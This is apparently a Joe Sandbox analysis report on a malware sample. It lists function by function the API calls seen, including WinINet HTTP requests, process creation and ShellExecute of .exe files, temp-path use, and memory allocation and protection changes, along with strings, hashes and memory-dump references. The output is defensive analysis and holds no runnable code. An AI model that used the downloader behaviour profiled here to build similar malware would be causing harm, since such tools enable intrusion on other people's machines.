Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: mixtwo$nosub
API String ID: 3472027048-187875987
Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF

Function 006FCBDA Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,006FCB73,00000004,?), ref: 006FCC4D

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 012dc3a2b77e7553ca813affac8233bfd792182b5df0f66edde9434966609745
Instruction ID: 32c59a33df2804b41717c27ac1a71c0078aa2adb0cd7d8e1a66ec64e020d0a67
Opcode Fuzzy Hash: 012dc3a2b77e7553ca813affac8233bfd792182b5df0f66edde9434966609745
Instruction Fuzzy Hash: 7911C8F644D74E6FE301CF21AB229FA3B6ADB85771720485FF545CB151C2258C06A735

Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000152A
__cftof.LIBCMT ref: 10001624
InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
InternetCloseHandle.WININET(00000000), ref: 100016E0
InternetCloseHandle.WININET(00000000), ref: 100016E3
InternetCloseHandle.WININET(00000000), ref: 100016E9

Strings

http://, xrefs: 10001567
GET, xrefs: 100016AA

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
String ID: GET$http://
API String ID: 1233269984-1632879366
Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

Function 00401830 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF

Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915

Strings

GET, xrefs: 004020E7
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
http://, xrefs: 00401EF4, 004021D3
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
text, xrefs: 00401B8F
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
API String ID: 2146599340-4172842843
Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4

Function 04A2003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04A2024D

Strings

cess, xrefs: 04A2018D
kernel32.dll, xrefs: 04A2008F, 04A20095

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: fe0d03be4dd89635c35c1c63cad4de25a2d98954a70c8e429610f9cf55a1303c
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 14526975A05229DFDB64CF68C984BACBBB1BF09304F1480D9E94DAB351DB30AA85DF14

Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264
networkcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000117F
InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA

Strings

text, xrefs: 10001327

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
String ID: text
API String ID: 1154000607-999008199
Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

Function 00405A50 Relevance: 8.2, APIs: 2, Strings: 3, Instructions: 678sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,A5E27AAC), ref: 00410837
Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856

Sleep.KERNEL32(000003E8), ref: 00405AB0

Strings

u%, xrefs: 00406936
SUB=, xrefs: 00405AB8
get, xrefs: 00405EB1

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: SUB=$get$u%
API String ID: 2563648476-4163392738
Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A

CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155

Strings

.exe, xrefs: 1000206B
open, xrefs: 1000214F

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: .exe$open
API String ID: 1627157292-49952409
Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

Function 00401E50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

http://, xrefs: 004021D3

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: http://
API String ID: 0-1121587658
Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94

Function 00402220 Relevance: 4.6, APIs: 3, Instructions: 53
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
CloseHandle.KERNEL32(00000000), ref: 0040227E

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 0ce2a982ba24ae4bec4079ca5a6e20e5ddab37ddaeafeb09f518e5d42abd3d08
Instruction ID: b0b2b5f3f087a2371d61f62415ac43be552c3c854a73bf1a6b1b437ed68fdf7e
Opcode Fuzzy Hash: 0ce2a982ba24ae4bec4079ca5a6e20e5ddab37ddaeafeb09f518e5d42abd3d08
Instruction Fuzzy Hash: D101D231600208ABD720DBA8ED49FEEB7E8EB48714F40417EF905A72D0DBB46D45CB58

Function 00410576 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00410570,00000016,0040CDE2,?,?,A5E27AAC,0040CDE2,?), ref: 00410587
TerminateProcess.KERNEL32(00000000,?,00410570,00000016,0040CDE2,?,?,A5E27AAC,0040CDE2,?), ref: 0041058E
ExitProcess.KERNEL32 ref: 004105A0

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
Instruction ID: d13b5d96fb023a3732090606adae14321ad35c591e2cfba48d8bc5efe980f875
Opcode Fuzzy Hash: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
Instruction Fuzzy Hash: 81D09231000208FBCF01AF61DD0D9CE3F2AAF44365B008035BD094A132DFB99ED69E88

Function 006FCBC9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,006FCB73,00000004,?), ref: 006FCC4D

Strings

R, xrefs: 006FCBCD

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: R
API String ID: 544645111-1466425173
Opcode ID: c133c05a00e7c9a9bdff45e290c8b53cea785ff17bde4aca1c1e65c979e83a8a
Instruction ID: 4ecc92f2f4fcd0a5bd56b0e68cc8f1d2eb00d1b8d27da90fb0a01eae350a3b5e
Opcode Fuzzy Hash: c133c05a00e7c9a9bdff45e290c8b53cea785ff17bde4aca1c1e65c979e83a8a
Instruction Fuzzy Hash: 59F0E9BA00811DAEE700CF516B25AFE3355D6C47703308C1BEA06CA010C2214D177A39

Function 00413CB9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,0042D884,?,?,004035B7,?,?,5(@), ref: 00413CEB

Strings

5(@, xrefs: 00413CBE

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 5(@
API String ID: 1279760036-4133491027
Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED

Function 004132F1 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00418A6B,?,00000000,?,?,00418A90,?,00000007,?,?,00418D6F,?,?), ref: 00413307
GetLastError.KERNEL32(?,?,00418A6B,?,00000000,?,?,00418A90,?,00000007,?,?,00418D6F,?,?), ref: 00413312

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
Instruction ID: 7e89cfa69ba2342e108e5ce36ee60186f347c9ea1b2ef774ccc21c1ed0765b4c
Opcode Fuzzy Hash: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
Instruction Fuzzy Hash: E9E086355002086BCB112FA1AC08BC53B68EB44395F404036F61CD6161DA388996879C

Function 04A20E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,04A20223,?,?), ref: 04A20E19
SetErrorMode.KERNEL32(00000000,?,?,04A20223,?,?), ref: 04A20E1E

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ffa71bfc03dfd8315567ba86dd98ef661066ab00ed43f1d21e9a8b2a47992f0d
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: EBD012311451287BD7402B94DC09BCD7B1CDF05B62F008011FB0DD9080C770954046E5

Function 006FCB77 Relevance: 1.6, APIs: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,006FCB73,00000004,?), ref: 006FCC4D

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3930a14401a38df198fb93a3a5716ec387f8e4531aef8c2a37e46077dfd0f0ea
Instruction ID: deee85ed13569fc717838ab2500e87863274d5eb42a892edf040deabef3c2b02
Opcode Fuzzy Hash: 3930a14401a38df198fb93a3a5716ec387f8e4531aef8c2a37e46077dfd0f0ea
Instruction Fuzzy Hash: 4E0140FA10C11DBDF601CA55AB26DFB276ED6C5B313308C6BFA4ACA110C2664D467639

Function 006FCB92 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,006FCB73,00000004,?), ref: 006FCC4D

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c56d03dabc31cc2881d7fcb9a7f2b2a3729409bd86fb0d81b34b8b0d374d1f29
Instruction ID: e183f4e6c7f2ecb6fda1a5f6054e8136d70fc378215cd9caddf71440baa11d6d
Opcode Fuzzy Hash: c56d03dabc31cc2881d7fcb9a7f2b2a3729409bd86fb0d81b34b8b0d374d1f29
Instruction Fuzzy Hash: 6B0181FA10810DBEF200CF55AB66DBF336ED5C5B317308C1AFA46C9500C5218E467A34

Function 006FCBAB Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,006FCB73,00000004,?), ref: 006FCC4D

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 81b51d2705044bc23b0704d6c34d9ab6437841004ea025a2cc96798f75523b26
Instruction ID: 823c2923d21980bed3e764ca2db004519f04eab26e670b738cb0d58f1258c8ea
Opcode Fuzzy Hash: 81b51d2705044bc23b0704d6c34d9ab6437841004ea025a2cc96798f75523b26
Instruction Fuzzy Hash: 200186FA14821DBFF300CF55AB619FA376AD6C4B70730981AF506CB111C2258D077A29

Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2

Function 006FCC19 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,006FCB73,00000004,?), ref: 006FCC4D

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1b89567be762d0ab3b9b27648c553d6159cec9aac530cb062e549c5b9f4897d6
Instruction ID: e44d0bf6b1df88fdd36b739768443fc614473146213aae33579357c324fffea8
Opcode Fuzzy Hash: 1b89567be762d0ab3b9b27648c553d6159cec9aac530cb062e549c5b9f4897d6
Instruction Fuzzy Hash: 9DE0C27100420E9FEB409FA1A2261FE3702E645B30B305C0BDA06CA520C4278C277E0C

Function 006FCC2A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,006FCB73,00000004,?), ref: 006FCC4D

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e9bb4b457fd946413001261d345c299ff9b276fbfe53650e9e7477a97fbee32b
Instruction ID: d15fac3f75dc9b94106b34f8d78e854a13a231832c95fadb30fcedb67d0c4c2e
Opcode Fuzzy Hash: e9bb4b457fd946413001261d345c299ff9b276fbfe53650e9e7477a97fbee32b
Instruction Fuzzy Hash: 26E0C23440465F5BDB51AF65851A2FE7B91EF107107104D5FD8825A921C5B38C26EF0D

Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 10005C07

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691

Function 04948123 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04948174

Memory Dump Source

Source File: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4940000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: f3ce5dacbb45bae1ef14f5f4ff3bed8da7d86184bb4f6d81cb094d83e4a7de7a
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 7B113C79A00208EFDB01DF98C985E98BBF5AF48350F0580A5F9489B361D371EA50DF80

Function 00402E60 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E6F

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5

Function 00402E80 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 00402E8C

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84

Non-executed Functions

Function 04A23FA7 Relevance: 43.8, APIs: 20, Strings: 4, Instructions: 1839sleepcomCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04A24011
Sleep.KERNEL32(000003E8), ref: 04A241A9
__Init_thread_footer.LIBCMT ref: 04A2477E
__Init_thread_footer.LIBCMT ref: 04A24944
